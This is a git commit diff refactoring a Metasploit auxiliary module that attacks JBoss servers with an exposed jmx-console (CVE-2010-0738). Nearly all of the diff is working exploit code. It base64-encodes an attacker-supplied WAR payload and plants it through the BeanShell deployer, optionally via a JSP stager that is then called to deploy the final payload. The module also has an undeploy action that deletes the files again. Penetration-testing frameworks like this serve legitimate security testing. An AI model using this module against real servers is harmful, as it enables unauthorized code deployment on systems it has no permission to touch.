Refactor auxiliary module

jvazquez-r7 · jvazquez-r7 · commit 0737d0dbd556 · 2014-08-22T17:05:45.000-05:00
diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb
@@ -11,99 +11,125 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'            => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',
-      'Description' => %q{
-          This module can be used to install a WAR file payload on JBoss servers that have
+      'Name'          => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',
+      'Description'   => %q{
+        This module can be used to install a WAR file payload on JBoss servers that have
         an exposed "jmx-console" application. The payload is put on the server by
         using the jboss.system:BSHDeployer\'s createScriptDeployment() method.
       },
-      'Author'       =>
+      'Author'        =>
         [
           'us3r777 <us3r777[at]n0b0.so>'
         ],
-      'License'     => BSD_LICENSE,
-      'References'  =>
+      'References'    =>
         [
           [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
           [ 'OSVDB', '64171' ],
           [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
-          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
-        ]
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]
+        ],
+      'Actions'       =>
+        [
+          ['Deploy'],
+          ['Undeploy']
+        ],
+      'DefaultAction' => 'Deploy',
+      'License'       => BSD_LICENSE,
     )
 
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('APPBASE',    [ true,  'Application base name']),
-        OptString.new('STAGERNAME', [ false, 'Only used if VERB is not POST (default: "stager")', 'stager']),
-        OptString.new('WARFILE',    [ true,  'The WAR file to deploy']),
-        OptBool.new('DEPLOY',       [ true,  'Deploy: true. Undeploy: false', true]),
+        OptString.new('APPBASE',    [ true,  'Application base name', 'payload']),
+        OptString.new('STAGERNAME', [ false, 'Only used if VERB is not POST', 'stager']),
+        OptPath.new('WARFILE',      [ false, 'The WAR file to deploy'])
       ], self.class)
   end
 
-  def run
-    app_base = datastore['APPBASE']
-    stager_base = datastore['STAGERNAME'] || 'stager'
-    stager_jsp_name = datastore['STAGERNAME'] || 'stager'
+  def deploy_action(app_base, stager_name, war_data)
+    encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
 
-    uri = '/' + app_base + '/'
-    if datastore['DEPLOY']
-      # Read the WAR from the given file
-      war_data = File.read(datastore['WARFILE'])
-      encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
-      if http_verb == 'POST' then
-        print_status("Deploying payload...")
-        opts = {
-          :file => "#{app_base}.war",
-          :contents => encoded_payload
-        }
+    if http_verb == 'POST'
+      print_status("#{peer} - Deploying payload...")
+      opts = {
+        :file => "#{app_base}.war",
+        :contents => encoded_payload
+      }
+    else
+      print_status("#{peer} - Deploying stager...")
+      stager_contents = stager_jsp(app_base)
+      opts = {
+        :dir => "#{stager_name}.war",
+        :file => "#{stager_name}.war/#{stager_name}.jsp",
+        :contents => Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')
+      }
+    end
+
+    bsh_payload = generate_bsh(:create, opts)
+    package = deploy_bsh(bsh_payload)
+
+    if package.nil?
+      print_error("#{peer} - Deployment failed")
+      return
+    else
+      print_good("#{peer} - Deployment successful")
+    end
+
+    unless http_verb == 'POST'
+      # call the stager to deploy our real payload war
+      stager_uri = '/' + stager_name + '/' + stager_name + '.jsp'
+      payload_data = "#{rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}"
+      print_status("#{peer} - Calling stager #{stager_uri } to deploy final payload...")
+      res = deploy('method' => 'POST',
+                   'data'   => payload_data,
+                   'uri'    => stager_uri)
+      if res && res.code == 200
+        print_good("#{peer} - Payload deployed")
       else
-        print_status("Deploying stager...")
-        stager_base     = rand_text_alpha(8+rand(8))
-        stager_jsp_name = rand_text_alpha(8+rand(8))
-        stager_contents = stager_jsp(app_base)
-        opts = {
-          :dir => "#{stager_base}.war",
-          :file => "#{stager_base}.war/#{stager_jsp_name}.jsp",
-          :contents => Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')
-        }
+        print_error("#{peer} - Failed to deploy final payload")
       end
-      bsh_payload = generate_bsh(:create, opts)
-      package = deploy_bsh(bsh_payload)
+    end
 
-      if package.nil?
-        fail_with(Failure::Unknown, "Failed to deploy")
-      end
+  end
 
-      unless http_verb == 'POST'
-        # now we call the stager to deploy our real payload war
-        stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp'
-        payload_data = "#{rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}"
-        print_status("Calling stager #{stager_uri } to deploy final payload")
-        res = deploy('method' => 'POST',
-                     'data'   => payload_data,
-                     'uri'    => stager_uri)
-        unless res && res.code == 200
-          fail_with(Failure::Unknown, "Failed to deploy")
-        end
+  def undeploy_action(app_base, stager_name)
+    # Undeploy the WAR and the stager if needed
+    print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")
+
+    files = {}
+    unless stager_name.nil?
+      files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"
+      files[:stager_base] = "#{stager_name}.war"
     end
+    files[:app_base] = "#{app_base}.war"
+    delete_script = generate_bsh(:delete, files)
 
+    package = deploy_bsh(delete_script)
+    if package.nil?
+      print_error("#{peer} - Unable to remove WAR")
     else
-      # Undeploy the WAR and the stager if needed
-      print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
+      print_good("#{peer} - Successfully removed")
+    end
+  end
 
-      files = {}
-      unless http_verb == 'POST'
-        files[:stager_jsp_name] = "#{stager_base}.war/#{stager_jsp_name}.jsp"
-        files[:stager_base] = "#{stager_base}.war"
-      end
-      files[:app_base] = "#{app_base}.war"
-      delete_script = generate_bsh(:delete, files)
+  def run
+    app_base = datastore['APPBASE']
+    if http_verb == 'POST'
+      stager_name = nil
+    else
+      stager_name = datastore['STAGERNAME']
+      stager_name = "stager" if stager_name.blank?
+    end
 
-      package = deploy_bsh(delete_script)
-      if package.nil?
-        print_warning("WARNING: Unable to remove WAR")
+    case action.name
+    when 'Deploy'
+      unless File.exist?(datastore['WARFILE'])
+        print_error("WAR file not found")
       end
+      war_data = File.read(datastore['WARFILE'])
+      deploy_action(app_base, stager_name, war_data)
+    when 'Undeploy'
+      undeploy_action(app_base, stager_name)
     end
   end
 end
